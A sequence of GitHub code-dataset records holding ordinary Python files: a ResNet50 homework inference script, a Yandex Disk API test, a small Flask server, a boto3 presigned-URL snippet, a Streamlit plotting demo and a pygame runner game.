csv.reader(f)\n for row in csvreader:\n id, fn, klass = row\n if id != 'id':\n self.filenames.append(fn)\n self.transform = transform\n \n def __getitem__(self, index):\n fn 
= self.filenames[index]\n image = Image.open(self.dirpath + '/' + fn)\n if self.transform is not None:\n image = self.transform(image)\n return image, fn\n \n def __len__(self):\n return len(self.filenames)\n\n\n\n# dataloader = {\n# 'train': DataLoader(trainset, batch_size=64, shuffle=True, num_workers=4),\n# 'val': DataLoader(valset, batch_size=64, shuffle=False, num_workers=4),\n# }\n# dataiter = iter(dataloader['train'])\n# images, labels = dataiter.next()\n# print('Image tensor in each batch:', images.shape, images.dtype)\n# print('Image tensor in each batch:', labels.shape, labels.dtype)\n\n# Model\nclass MyNN(nn.Module):\n def __init__(self, backbone_checkpoint=None, classifier_checkpoint=None, fix_backbone=False):\n super().__init__()\n self.backbone = models.resnet50(weights=None)\n if backbone_checkpoint is not None:\n self.backbone.load_state_dict(torch.load(backbone_checkpoint))\n for param in self.backbone.parameters():\n if fix_backbone:\n param.requires_grad = False\n else:\n param.requires_grad = True\n\n self.classifier = nn.Sequential(\n nn.Linear(1000, 512),\n nn.BatchNorm1d(512),\n nn.ReLU(),\n nn.Dropout(0.5),\n nn.Linear(512, 256),\n nn.BatchNorm1d(256),\n nn.ReLU(),\n nn.Dropout(0.5),\n nn.Linear(256, 65)\n )\n if classifier_checkpoint is not None:\n self.classifier.load_state_dict(torch.load(classifier_checkpoint))\n for param in self.classifier.parameters():\n param.requires_grad = True\n \n def forward(self, x):\n x = self.backbone(x)\n x = self.classifier(x)\n return x\n\n def get_params_to_update(self):\n params_to_update = []\n for param in self.backbone.parameters():\n if param.requires_grad:\n params_to_update.append(param)\n else:\n break\n for param in self.classifier.parameters():\n if param.requires_grad:\n params_to_update.append(param)\n else:\n break\n return params_to_update\n\n# Output\ndef out2csv(outpath, imagenames, predictions, in_csv):\n fout = open(outpath, \"w\")\n with open(in_csv) as fin:\n csvreader = csv.reader(fin)\n for row in csvreader:\n id, fn, klass = row\n if id != 'id':\n index = imagenames.index(fn)\n klass = predictions[index]\n fout.write(id + \",\" + fn + \",\" + klass + \"\\n\")\n else:\n fout.write(id + \",\" + fn + \",\" + klass + \"\\n\")\n fout.close()\n\nif __name__ == '__main__':\n if len(sys.argv) != 5:\n print('Error: wrong format')\n print('\\tpython3 hw4_2_test.py ')\n exit()\n\n in_csv = sys.argv[1]\n in_dir = sys.argv[2]\n out_csv = sys.argv[3]\n mode = sys.argv[4]\n\n # dataset & dataloader\n valset = HW4P2ATest(\n dirpath=in_dir,\n csvpath=in_csv,\n transform=transforms.Compose([\n transforms.Resize((128, 128)),\n transforms.ToTensor(),\n transforms.Normalize(mean, std),\n ])\n )\n dataloader = {\n 'val': DataLoader(valset, batch_size=64, shuffle=False, num_workers=4),\n }\n\n # model\n backbone_checkpoint=\"./bestcheckpoin/hw4_2C_backbone.pt\"\n classifier_checkpoint=\"./bestcheckpoin/hw4_2C_classifier.pt\"\n # if mode == 'A':\n # backbone_checkpoint=\"./checkpoint/hw4_2A_backbone.pt\"\n # classifier_checkpoint=\"./checkpoint/hw4_2A_classifier.pt\"\n # elif mode == 'B':\n # backbone_checkpoint=\"./checkpoint/hw4_2B_backbone.pt\"\n # classifier_checkpoint=\"./checkpoint/hw4_2B_classifier.pt\"\n # elif mode == 'C':\n # backbone_checkpoint=\"./checkpoint/hw4_2C_backbone.pt\"\n # classifier_checkpoint=\"./checkpoint/hw4_2C_classifier.pt\"\n # elif mode == 'D':\n # backbone_checkpoint=\"./checkpoint/pretrain_model_SL.pt\"\n # classifier_checkpoint=\"./checkpoint/hw4_2D_classifier.pt\"\n # else:\n # 
backbone_checkpoint=\"./checkpoint/mybackbone.pt\"\n # classifier_checkpoint=\"./checkpoint/hw4_2E_classifier.pt\"\n\n mynn = MyNN(\n backbone_checkpoint=backbone_checkpoint,\n classifier_checkpoint=classifier_checkpoint,\n fix_backbone=False\n )\n mynn = mynn.to(device)\n\n # inference\n mynn.eval()\n filenames = []\n klasses = []\n with torch.no_grad():\n for _, (images, fns) in enumerate(dataloader['val']):\n images = images.to(device) \n\n outs = mynn(images)\n preds = outs.max(1, keepdim=True)[1]\n filenames.extend(fns)\n for pred in preds:\n klasses.append(label2class[pred])\n\n # output\n out2csv(out_csv, filenames, klasses, in_csv)\n\n","repo_name":"mirkat1206/NTU-DLCV-Fall-2022","sub_path":"hw4/hw4_2_test.py","file_name":"hw4_2_test.py","file_ext":"py","file_size_in_byte":7539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"126238139","text":"# -*- coding: utf-8 -*-\nimport json\n\nfrom mock import mock\nfrom nose_parameterized import parameterized\n\nfrom mpfs.core.services.discovery_service import DiscoveryService\nfrom test.base_suit import (\n UploadFileTestCaseMixin,\n UserTestCaseMixin,\n)\nfrom test.helpers.size_units import KB\nfrom test.parallelly.api.disk.base import DiskApiTestCase\nfrom mpfs.common.static import tags\nfrom mpfs.config import settings\n\n\nclass MPFSFile(object):\n def __init__(self, name, size=123):\n self.mpfs_path = '/disk/%s' % name\n self.platform_path = 'disk:/%s' % name\n self.size = size\n\n\nclass OnlineEditorURLTestCase(UserTestCaseMixin, UploadFileTestCaseMixin, DiskApiTestCase):\n api_mode = tags.platform.EXTERNAL\n api_version = 'v1'\n method = 'GET'\n url = 'disk/resources/online-editor'\n\n file_supported_with_conversion = MPFSFile('enot.doc')\n supported_file = MPFSFile('enot.docx')\n unsupported_file_by_extension = MPFSFile('enot.rtf')\n unsupported_file_by_size = MPFSFile('enot.xlsx', settings.office['size_limits']['Excel']['edit'] + 10*KB)\n\n allowed_client_id = settings.platform['disk_apps_ids'][0]\n\n @classmethod\n def setup_class(cls):\n super(OnlineEditorURLTestCase, cls).setup_class()\n with open('fixtures/xml/discovery.xml') as fd:\n discovery_response_xml = fd.read()\n with mock.patch('mpfs.core.services.discovery_service.DiscoveryService.open_url',\n return_value=discovery_response_xml):\n DiscoveryService().ensure_cache()\n\n def setup_method(self, method):\n super(OnlineEditorURLTestCase, self).setup_method(method)\n self.create_user(self.uid, noemail=1)\n for file in (self.file_supported_with_conversion,\n self.supported_file,\n self.unsupported_file_by_extension,\n self.unsupported_file_by_size):\n self.upload_file(self.uid, file.mpfs_path, file_data={'size': file.size})\n\n @parameterized.expand([\n ('supported', supported_file.platform_path, None, 'disk.yandex.ru'),\n ('supported_with_conversion', file_supported_with_conversion.platform_path, None, 'disk.yandex.ru'),\n ('tld_passed', file_supported_with_conversion.platform_path, 'com', 'disk.yandex.com'),\n ('unsupported_tld_passed', file_supported_with_conversion.platform_path, 'pt', 'disk.yandex.ru'),\n ])\n def test_positive_cases(self, case_name, path, tld, expected_hostname):\n query = {'path': path}\n if tld is not None:\n query['tld'] = tld\n\n with self.specified_client(id=self.allowed_client_id):\n resp = self.client.request(self.method, self.url,\n query=query)\n\n result = json.loads(resp.content)\n\n assert 'edit_url' in result\n assert expected_hostname in result['edit_url']\n\n\n 
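# each variant below should be refused with HTTP 415 (unsupported media type)\n    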
@parameterized.expand([\n        ('by_size', unsupported_file_by_size.platform_path),\n        ('by_extension', unsupported_file_by_extension.platform_path),\n    ])\n    def test_unsupported_files(self, case_name, path):\n        with self.specified_client(id=self.allowed_client_id):\n            resp = self.client.request(self.method, self.url,\n                                       query={'path': path})\n\n        assert resp.status_code == 415\n\n    @mock.patch('mpfs.core.office.util.FEATURE_TOGGLES_ONLYOFFICE_EDITOR_FOR_USERS_WITHOUT_EDITOR_ENABLED', False)\n    def test_user_with_disabled_editor(self):\n        with self.specified_client(id=self.allowed_client_id), \\\n                mock.patch('mpfs.core.office.logic.microsoft.MicrosoftEditor.is_user_allowed', return_value=False):\n            resp = self.client.request(self.method, self.url,\n                                       query={'path': self.supported_file.platform_path})\n\n        assert resp.status_code == 403\n\n    def test_not_found(self):\n        with self.specified_client(id=self.allowed_client_id):\n            resp = self.client.request(self.method, self.url,\n                                       query={'path': u'disk:/Диплом 2003.docx'})\n\n        assert resp.status_code == 404\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"disk/test/parallelly/api/disk/office_online_editor_url.py","file_name":"office_online_editor_url.py","file_ext":"py","file_size_in_byte":4174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"524387912","text":"from flask import Flask, request, render_template \nfrom flask import redirect, url_for\n\nimport os\nimport os.path\n\nimport gensim\nfrom modules import mod_recommend\n\n\n''' BASIC FUNCTIONS BEGIN '''\n\napp = Flask(__name__, static_url_path='')\n\n@app.route('/error', methods=['GET', 'POST'])\n#@interceptor(login_required=False)\ndef error():\n\tmsg = request.args.get('msg')\n\treturn render_template('error.html',msg=msg)\n\n@app.errorhandler(404)\ndef page_not_found(e):\n\treturn render_template('error.html',msg=e)\n\n\n''' BUSINESS FUNCTIONS BEGIN '''\n\n\n@app.route('/recommend', methods=['GET', 'POST'])\n#@interceptor(login_required=True)\ndef search():\n\tresult = mod_recommend.service(request)\n\treturn result \n\n\n''' MAIN ENTRY '''\nif __name__ == '__main__':\n\tapp.debug = True\n\tapp.run(host=\"jinrongdao.com\",port=5200)\n","repo_name":"hongleifu/recommend","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"31811212829","text":"import boto3\n\n#example variable with a bucket name\nBUCKET_NAME = \"cf-templates-15esisdhwosya-eu-west-2\"\n\ns3 = boto3.client(\"s3\")\n\n\n# Presigned URL to give limited access to an unauthorized user\nurl = s3.generate_presigned_url(\n    \"get_object\", Params={\"Bucket\": BUCKET_NAME, \"Key\": \"burger.jpg\"}, ExpiresIn=30\n)\nprint(url)","repo_name":"giandulfo/boto3s3","sub_path":"presignedUrl.py","file_name":"presignedUrl.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"74855456552","text":"import streamlit as st\nimport matplotlib.pyplot as plt\nfrom bokeh.plotting import figure\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\n\nimport plotLib\n\n@st.cache\ndef fetchDataset(dataset):\n    return sns.load_dataset(dataset)\n\nst.set_page_config(layout=\"wide\")\nst.header(\"Plotting with Streamlit\")\n\ngenre = st.sidebar.radio(\"Pick a Plotting Package\",('matplotlib','seaborn', 'plotly express', 'plotly',
'bokeh','altair','networkx','vega'))\n\nif genre == 'matplotlib':\n st.header(\"matplotlib\")\n st.write(\"https://matplotlib.org/stable/gallery/index.html\")\n with st.echo():\n fig, axs = plt.subplots(nrows=1, ncols=2, figsize=(9, 4))\n plotLib.matPlot(axs) # internal library\n st.write(fig)\n\nelif genre == 'bokeh':\n st.header(\"bokeh\")\n st.write(\"https://docs.bokeh.org/en/latest/docs/gallery.html\")\n with st.echo():\n p = figure( title=\"Texas Unemployment, 2009\", tools=\"pan,wheel_zoom,reset,hover,save\",\n x_axis_location=None, y_axis_location=None,\n tooltips=[(\"Name\", \"@name\"), (\"Unemployment rate\", \"@rate%\"), (\"(Long, Lat)\", \"($x, $y)\")])\n plotLib.bokehPlot(p) # internal library\n st.bokeh_chart(p, use_container_width=False)\n\nelif genre == 'plotly express':\n st.header(\"plotly express\")\n st.write(\"https://plotly.com/python/plotly-express/\")\n with st.echo():\n import plotly.express as px\n df = px.data.iris()\n fig = px.scatter_matrix(df, dimensions=[\"sepal_width\", \"sepal_length\", \"petal_width\", \"petal_length\"], color=\"species\")\n st.plotly_chart(fig, use_container_width=True)\nelif genre == 'plotly':\n st.header(\"plotly\")\n st.write(\"https://plotly.com/python\")\n with st.echo():\n fig = plotLib.plotlyPlot() # internal library\n st.plotly_chart(fig, use_container_width=True)\nelif genre == 'altair':\n st.header(\"altair\")\n st.write(\"https://altair-viz.github.io/gallery/\")\n with st.echo():\n fig = plotLib.altairPlot()\n st.write(fig) # internal library\nelif genre == 'networkx':\n st.header(\"networkx\")\n st.write(\"https://networkx.org/documentation/stable/auto_examples/index.html\")\n with st.echo():\n import networkx as nx\n # G = nx.grid_2d_graph(5, 5) # 5x5 grid\n G = nx.lollipop_graph(4, 6)\n fig, ax = plt.subplots()\n nx.draw(G, ax = ax, with_labels = True)\n st.write(fig)\nelif genre == 'vega':\n st.header(\"vega\")\n st.write(\"https://vega.github.io/vega-lite/examples/\")\n with st.echo():\n df = pd.DataFrame(np.random.randn(200, 3),columns=['a', 'b', 'c'])\n st.vega_lite_chart(df, {\n 'mark': {'type': 'circle', 'tooltip': True},\n 'encoding': {\n 'x': {'field': 'a', 'type': 'quantitative'},\n 'y': {'field': 'b', 'type': 'quantitative'},\n 'size': {'field': 'c', 'type': 'quantitative'},\n 'color': {'field': 'c', 'type': 'quantitative'}},\n }, True)\nelif genre == 'seaborn':\n st.header(\"seaborn\")\n st.write(\"https://seaborn.pydata.org/examples/index.html\")\n with st.echo():\n \n penguins = fetchDataset(\"penguins\")\n\n st.title(\"Penguins PairPlot\")\n fig = sns.pairplot(penguins, hue=\"species\")\n st.pyplot(fig)\n\n\n","repo_name":"cliffweng/datavis_streamlit","sub_path":"mainDash.py","file_name":"mainDash.py","file_ext":"py","file_size_in_byte":3258,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"73051054313","text":"# Stefan in Sensorland\nimport matplotlib.image as img\nimport numpy as np\nimport os\nimport time\nimport pygame\nimport random\nfrom leaderboard.leader_board import *\nfrom controls.input_control import *\nfrom shutdown.shutdown import ShutDown\n\nGROUND_LEVEL = 31\nNUMBER_OF_CIRCUIT_ELEMENTS = 23 #Number of parts to combine the circuits\n#Values for the color transformation of the circuit\nCIRCUIT_RED_VALUES = [9, 126, 210]\nCIRCUIT_TARGET_VALUES = [[[9, 94, 42], [126, 152, 63], [210, 192, 42]],\n [[2, 45, 213], [126, 152, 63], [210, 192, 42]],\n [[213, 64, 24], [126, 152, 63], [210, 192, 42]],\n [[0, 0, 0], [126, 152, 63], [210, 192, 
42]],\n                         [[213, 24, 148], [126, 152, 63], [210, 192, 42]],\n                         [[9, 94, 42], [126, 152, 63], [210, 192, 42]]\n                         ]\nSENSORLAND_SPEED = [2.5, 3, 4, 5, 6, 7]\nSENSORLAND_ITERATION_INC = [1, 2, 2, 3, 3, 4]\nSENSORLAND_END_OF_ROAD = [500, 2000, 3000, 4000, 5000, 50000]\n\nSENSORLAND_PARABOLAS = [[-8, -6, -4, -2, -1, -1, -1, -1, 0, 0, 0, 1, 1, 1, 1, 2, 4, 6, 8],\n                        [-8, -6, -4, -2, -2, -1, -1, 1, 1, 2, 2, 4, 6, 8],\n                        [-8, -6, -4, -3, -2, -1, 1, 2, 3, 4, 6, 8],\n                        [-10, -7, -4, -2, -1, 1, 2, 4, 7, 10],\n                        [-10, -7, -4, -3, 3, 4, 7, 10],\n                        [-12, -8, -4, 4, 8, 12]]\n\ndef load_and_transpose_image(path_to_image):\n    \"\"\"Load and transpose image, scale it to range 0,...,255\n\n    :param path_to_image: path to image\n    :return:\n    \"\"\"\n    image_raw = img.imread(path_to_image)\n    return np.transpose(image_raw, (1, 0, 2)) * 255\n\n\ndef transform_color(image, red_values, target_values):\n    \"\"\"Do a color transformation of an image based on its red values\n    It would be better if the image was gray-scale and we could color\n    it with the unique gray values, but you don't always get what you wish for ;-)\n\n    :param image: original image\n    :param red_values: key values\n    :param target_values: pixels whose red channel matches a key value are colored with these triplets\n    :return: colorized image\n    \"\"\"\n    image_transformed = image.copy()\n    image_red = image[:, :, 0]\n    for key, target in zip(red_values, target_values):\n        image_transformed[:, :, 0][image_red == key] = target[0]\n        image_transformed[:, :, 1][image_red == key] = target[1]\n        image_transformed[:, :, 2][image_red == key] = target[2]\n    return image_transformed\n\n\nclass Circuit:\n    \"\"\"Class to handle the random circuit of sensor land\n\n    \"\"\"\n\n    def __init__(self):\n        \"\"\"\n        Init the circuit\n        \"\"\"\n        self.elements = []\n        self.max_element_size = 64\n        for i in range(NUMBER_OF_CIRCUIT_ELEMENTS):\n            element = load_and_transpose_image('sensorland/images/circuit_{:d}.png'.format(i))\n            self.elements.append(element)\n            self.max_element_size = max(self.max_element_size, element.shape[0])\n            self.y = element.shape[1]\n        self.position = 0\n        self.image = np.zeros((self.max_element_size * 3, self.y, 4))\n        self.generate_image()\n\n    def scroll(self, delta=1):\n        \"\"\"Scroll the image further\n\n        :param delta: scroll by delta steps\n        :return:\n        \"\"\"\n        if delta>0:\n            self.image[:-delta, :, :] = self.image[delta:, :, :]\n            self.position -= delta\n            if self.position <= 2 * self.max_element_size:\n                self.generate_image()\n\n    def generate_image(self):\n        \"\"\"Fill the image with random circuit elements\n\n        :return:\n        \"\"\"\n        while self.position <= 2*self.max_element_size:\n            index = random.randint(0, len(self.elements)-1)\n            new_element = self.elements[index]\n            delta = new_element.shape[0]\n            self.image[self.position:self.position+delta, :, :] = new_element[:,:,:]\n            self.position += delta\n\ndef get_image_scene(position_x, width_x, image_in):\n    \"\"\"Get section of the image\n\n    :param position_x: position of the runner\n    :param width_x: width of the screen\n    :param image_in: input image\n    :return:\n    \"\"\"\n    image_out = np.zeros((width_x, image_in.shape[1], image_in.shape[2]))\n    start = position_x % image_in.shape[0]\n    stop = start + width_x\n    if stop < image_in.shape[0]:\n        image_out[:, :, :] = image_in[start:stop, :, :]\n    else:\n        delta = image_in.shape[0] - start\n        image_out[:delta, :, :] = image_in[start:, :, :]\n        image_out[delta:, :, :] = image_in[:width_x - delta, :, :]\n    return image_out\n\n\ndef compute_mask(sprite):\n    \"\"\"Compute foreground mask; pixels that are covered by the 
sprite\n\n :param sprite: sprite input\n :return: mask\n \"\"\"\n mask = np.zeros((sprite.shape[0], sprite.shape[1]))\n indices_fg = sprite[:, :, 3] > 0\n mask[indices_fg] = 1\n return mask\n\n\ndef add_mask(mask, offset_x, offset_y, field):\n \"\"\"\n\n :param mask:\n :param offset_x:\n :param offset_y:\n :param field:\n :return:\n \"\"\"\n for xm in range(mask.shape[0]):\n for ym in range(mask.shape[1]):\n x = xm + offset_x\n y = ym + offset_y\n if 0 <= x < field.shape[0] and 0 <= y < field.shape[1]:\n field[x, y] += mask[xm, ym]\n\n\ndef check_collision(player, obstacles, max_x, max_y):\n \"\"\"Check the collision between the player and the list of obstacles in the area\n 0:max_x, 0:max_y\n\n :param player:\n :param obstacles:\n :param max_x:\n :param max_y:\n :return:\n \"\"\"\n field = np.zeros((max_x, max_y))\n add_mask(player.mask, player.x, player.y, field)\n for obstacle in obstacles:\n add_mask(obstacle.mask, obstacle.x, obstacle.y, field)\n max_val = np.max(field[:])\n if max_val > 1:\n return True\n return False\n\n\nclass Player:\n def __init__(self, x, y, sprites_running, sprite_jumping, sprite_standing, sprite_dead):\n \"\"\"\n\n :param x:\n :param y:\n \"\"\"\n self.parabola = SENSORLAND_PARABOLAS[0]\n self.is_jumping = False\n self.is_dead = False\n self.is_running = False\n self.parabola_position = 0\n self.x = x\n self.y = y\n # Load jump sound\n self.sound_jump = pygame.mixer.Sound('sensorland/sound/jump.wav')\n # Init the sprites\n self.sprite_jumping = sprite_jumping\n self.sprite_running = sprites_running\n self.sprite_running_id = 0\n self.sprite_standing = sprite_standing\n self.sprite_dead = sprite_dead\n self.sprite = sprite_standing\n # Init the masks\n self.mask_jumping = compute_mask(self.sprite_jumping)\n self.mask_running = [compute_mask(sprite) for sprite in self.sprite_running]\n self.mask = self.mask_running[self.sprite_running_id]\n\n def jump(self):\n \"\"\"\n\n :return:\n \"\"\"\n if not self.is_jumping:\n self.is_jumping = True\n pygame.mixer.Sound.play(self.sound_jump)\n\n def die(self):\n \"\"\"\n\n :return:\n \"\"\"\n self.is_dead = True\n self.sprite = self.sprite_dead\n\n def update(self, iteration):\n \"\"\"\n\n :return:\n \"\"\"\n # check dead ? 
dead ?\n if self.is_dead:\n self.sprite = self.sprite_dead\n return\n # if jumping do jump sprite\n if self.is_jumping:\n self.sprite = self.sprite_jumping\n self.mask = self.mask_jumping\n self.y = self.y + self.parabola[self.parabola_position]\n self.parabola_position += 1\n if self.parabola_position >= len(self.parabola):\n self.parabola_position = 0\n self.is_jumping = False\n # Animate running\n else:\n if iteration % 5 == 0:\n self.sprite_running_id = (self.sprite_running_id + 1) % len(self.sprite_running)\n self.sprite = self.sprite_running[self.sprite_running_id]\n self.mask = self.mask_running[self.sprite_running_id]\n\n\ndef create_stefan():\n \"\"\" Function that initializes Stefan\n\n :return: Player Stefan\n \"\"\"\n stefan_0 = load_and_transpose_image('sensorland/images/stefan_0.png')\n stefan_1 = load_and_transpose_image('sensorland/images/stefan_1.png')\n stefan_jumping = load_and_transpose_image('sensorland/images/stefan_jumping.png')\n stefan_dead = load_and_transpose_image('sensorland/images/stefan_dead.png')\n stefan_standing = load_and_transpose_image('sensorland/images/stefan_standing.png')\n return Player(5, GROUND_LEVEL, [stefan_0, stefan_1], stefan_jumping, stefan_standing, stefan_dead)\n\n\nclass Element:\n def __init__(self, sprite, x, y):\n \"\"\"Initial element with its sprite and position\n\n :param sprite:\n :param x:\n :param y:\n \"\"\"\n self.sprite = sprite.copy()\n self.x = x\n self.y = y\n self.mask = compute_mask(self.sprite)\n\n def is_alive(self):\n \"\"\"Check if the element is still on the screen or could be removed\n\n :return:\n \"\"\"\n if self.x + self.sprite.shape[0] < 0:\n return False\n return True\n\n def move_relative(self, delta_x, delta_y):\n \"\"\"Move Element relative to the current position\n\n :param delta_x:\n :param delta_y:\n :return:\n \"\"\"\n self.x += delta_x\n self.y += delta_y\n\n\ndef get_obstacle():\n \"\"\"Get a new obstacle\n\n :return: An obstacle\n \"\"\"\n n_obstacles = 5\n obstacle_id = random.randint(0, n_obstacles-1)\n if obstacle_id == 0:\n image = load_and_transpose_image('sensorland/images/resistor.png')\n spawn_pos = [69, 35]\n elif obstacle_id == 1:\n image = load_and_transpose_image('sensorland/images/capacitor_0.png')\n spawn_pos = [69, 38]\n elif obstacle_id == 2:\n image = load_and_transpose_image('sensorland/images/voltage_regulator.png')\n spawn_pos = [70, 38]\n elif obstacle_id == 3:\n image = load_and_transpose_image('sensorland/images/led_red.png')\n spawn_pos = [68, 36]\n else:\n image = load_and_transpose_image('sensorland/images/led_green.png')\n spawn_pos = [68, 36]\n return Element(image, spawn_pos[0], spawn_pos[1])\n\n\nclass SensorLandGame:\n def __init__(self):\n self.path = os.path.dirname(__file__)\n self.display = 0\n self.mountains = 0\n self.input_control = 0\n self.player_y = GROUND_LEVEL\n self.circuit = Circuit()\n self.score = 0\n\n def get_title_image(self):\n \"\"\"Get the iconic image of the game\n\n \"\"\"\n im = img.imread('sensorland/images/stefan_in_sensor_land.png')\n image = np.transpose(im[:, :, :3], (1, 0, 2)) * 255\n return image\n\n def do_mountains(self, mountains, position):\n \"\"\"Move the mountains\n\n :return:\n \"\"\"\n m = get_image_scene(position, self.display.size_x, mountains)\n self.display.place_sprite(m, 0, 21)\n\n def do_circuit(self, rel_movement, level_id=0):\n \"\"\"Move the circuit\n\n :return:\n \"\"\"\n self.circuit.scroll(rel_movement)\n m = self.circuit.image[0:64, :, :]\n m = transform_color(m, CIRCUIT_RED_VALUES, CIRCUIT_TARGET_VALUES[level_id])\n 
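# blit the freshly recolored circuit strip onto its fixed band of the display\n        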
self.display.place_sprite(m, 0, 46)\n\n    def do_sky(self, sky, iteration):\n        \"\"\"Scroll the sky background along a slow circular path\n\n        :param sky:\n        :param iteration:\n        :return:\n        \"\"\"\n        x = int(32 + np.cos(iteration / 120) * 32)\n        y = int(32 + np.sin(iteration / 120) * 32)\n        self.display.show_image(sky[x:x + 64, y:y + 64, :])\n\n    def do_level(self, level_id):\n        \"\"\"Execute a certain level; the speed etc. are configured above and\n        accessed via the level id\n\n        :param level_id: id of the current level\n        :return: 1 -> Stefan reached the end of the level\n                 0 -> Stefan crashed into an obstacle\n                 -1 -> the player quit the game\n        \"\"\"\n        # Ready Player 1\n        mountains = img.imread('sensorland/images/mountains3.png')\n        mountains = np.transpose(mountains, (1, 0, 2)) * 255\n        sky = img.imread('sensorland/images/sky2.png')\n        sky = np.transpose(sky, (1, 0, 2)) * 255\n        stefan = create_stefan()\n        speed = SENSORLAND_SPEED[level_id]\n        iteration_increment = SENSORLAND_ITERATION_INC[level_id]\n        level_end = SENSORLAND_END_OF_ROAD[level_id]\n        min_peace_time = 40\n        remaining_peace_time = 40 * (1 + (iteration_increment-1)/2)\n        obstacles = []\n        running = True\n        move_pixels_remainder = 0\n        # Game loop\n        self.parabola = SENSORLAND_PARABOLAS[level_id]\n        while running:\n            remaining_peace_time -= 1\n            remaining_level = level_end-self.score\n            move_pixels_total = move_pixels_remainder + speed\n            move_pixels_integer = int(move_pixels_total)\n            move_pixels_remainder = move_pixels_total - move_pixels_integer\n            if remaining_level <= 0:\n                running = False\n            if remaining_peace_time == 0 and remaining_level > (100 * iteration_increment):\n                remaining_peace_time = random.randint(min_peace_time, 2*min_peace_time)\n                obstacle = get_obstacle()\n                obstacles.append(obstacle)\n            dead_obstacles = []\n            for obst in obstacles:\n                obst.move_relative(-move_pixels_integer, 0)\n                if not obst.is_alive():\n                    dead_obstacles.append(obst)\n            for obst in dead_obstacles:\n                obstacles.remove(obst)\n            self.do_sky(sky, self.score * 1)\n            self.do_mountains(mountains, int(self.score * 1))\n            self.do_circuit(move_pixels_integer, level_id)\n            for obst in obstacles:\n                self.display.place_sprite(obst.sprite, obst.x, obst.y)\n            # Jump\n            events = pygame.event.get()\n            if self.input_control.flex_chain:\n                if self.input_control.button_a_pressed == 1:\n                    self.input_control.button_a_pressed = 0\n                    stefan.jump()\n                if self.input_control.button_shutdown_pressed_long:\n                    shut = ShutDown()\n                    shut.run_game(self.display, self.input_control)\n                if self.input_control.button_b_pressed:\n                    self.input_control.button_b_pressed = 0\n                    return -1\n\n            if self.input_control.keyboard:\n                for event in events:\n                    if event.type == pygame.KEYDOWN:\n                        if event.key == pygame.K_UP:\n                            stefan.jump()\n                        if event.key == pygame.K_q:\n                            return -1\n                        if event.key == pygame.K_ESCAPE:\n                            shut = ShutDown()\n                            shut.run_game(self.display, self.input_control)\n\n            # Move\n            stefan.update(self.score)\n            # Check collision\n            stefan_is_dead = check_collision(stefan, obstacles, self.display.size_x, self.display.size_y)\n            if stefan_is_dead:\n                stefan.die()\n                running = False\n            self.display.place_sprite(stefan.sprite, stefan.x, stefan.y)\n\n            self.score += iteration_increment\n            # show score\n            self.display.write_string(\"SCORE\", 1, 0, background=None)\n            self.display.write_string(\"{:8d}\".format(self.score), 20, 0, background=None)\n            # show next speed\n            if remaining_level < (50 * iteration_increment):\n                self.display.write_string(\"NEXT LEVEL\", 10, 30, background=None)\n            self.display.show()\n            time.sleep(0.04)\n            if stefan_is_dead:\n                time.sleep(1)\n                return 0\n        return 1\n\n    def run_game(self, display, input_control):\n        \"\"\"Run the Game\n\n        \"\"\"\n        
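# bind display and input, then idle on the title scene until the player presses jump\n        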
self.display = display\n        self.input_control = input_control\n        leader_board = LeaderBoard('sensorland/records.txt')\n\n        mountains = img.imread('sensorland/images/mountains3.png')\n        mountains = np.transpose(mountains, (1, 0, 2)) * 255\n\n        sky = img.imread('sensorland/images/sky2.png')\n        sky = np.transpose(sky, (1, 0, 2)) * 255\n\n        # Ready Player 1\n        stefan = create_stefan()\n        # wait for 1st keypress\n        wait_for_start = True\n        self.input_control.button_a_pressed = 0\n        while wait_for_start:\n            self.do_sky(sky, 0)\n            self.do_mountains(mountains, 0)\n            self.do_circuit(0)\n            self.display.place_sprite(stefan.sprite, stefan.x, stefan.y)\n            if self.input_control.flex_chain:\n                if self.input_control.button_a_pressed == 1:\n                    self.input_control.button_a_pressed = 0\n                    wait_for_start = False\n                if self.input_control.button_shutdown_pressed_long:\n                    shut = ShutDown()\n                    shut.run_game(self.display, self.input_control)\n                if self.input_control.button_b_pressed:\n                    self.input_control.button_b_pressed = 0\n                    return\n\n            events = pygame.event.get()\n            if self.input_control.keyboard:\n                for event in events:\n                    if event.type == pygame.KEYDOWN:\n                        if event.key == pygame.K_UP:\n                            wait_for_start = False\n                        elif event.key == pygame.K_q:\n                            return\n                        elif event.key == pygame.K_ESCAPE:\n                            shut = ShutDown()\n                            shut.run_game(self.display, self.input_control)\n\n            time.sleep(0.1)\n            self.display.show()\n\n        self.score = 0\n        pygame.mixer.music.load('sensorland/sound/theme.mp3')\n        pygame.mixer.music.play(-1, 0.0)\n\n        # Execute the different levels\n        for level_id in range(6):\n            alive = self.do_level(level_id=level_id)\n            if alive == 0:\n                break\n            if alive == -1:\n                pygame.mixer.music.pause()\n                return\n\n        time.sleep(1)\n        self.display.clear_screen()\n        score_image = img.imread(os.path.join(self.path, 'images/high_score.png'))\n        score_image = np.transpose(score_image[:, :, :3], (1, 0, 2)) * 255\n        self.display.fade_to_image(score_image)\n        self.display.write_string(\"HIGH SCORE\", 13, 5, [236, 173, 42], background=None)\n        leader_board.fg_color = [0, 255, 255]\n        leader_board.bg_color = None\n        leader_board.run_leader_board(self.score, self.display, self.input_control)\n        time.sleep(2)\n        pygame.mixer.music.pause()\n","repo_name":"benjamindrayer/arcade","sub_path":"sensorland/sensorland.py","file_name":"sensorland.py","file_ext":"py","file_size_in_byte":18821,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"}
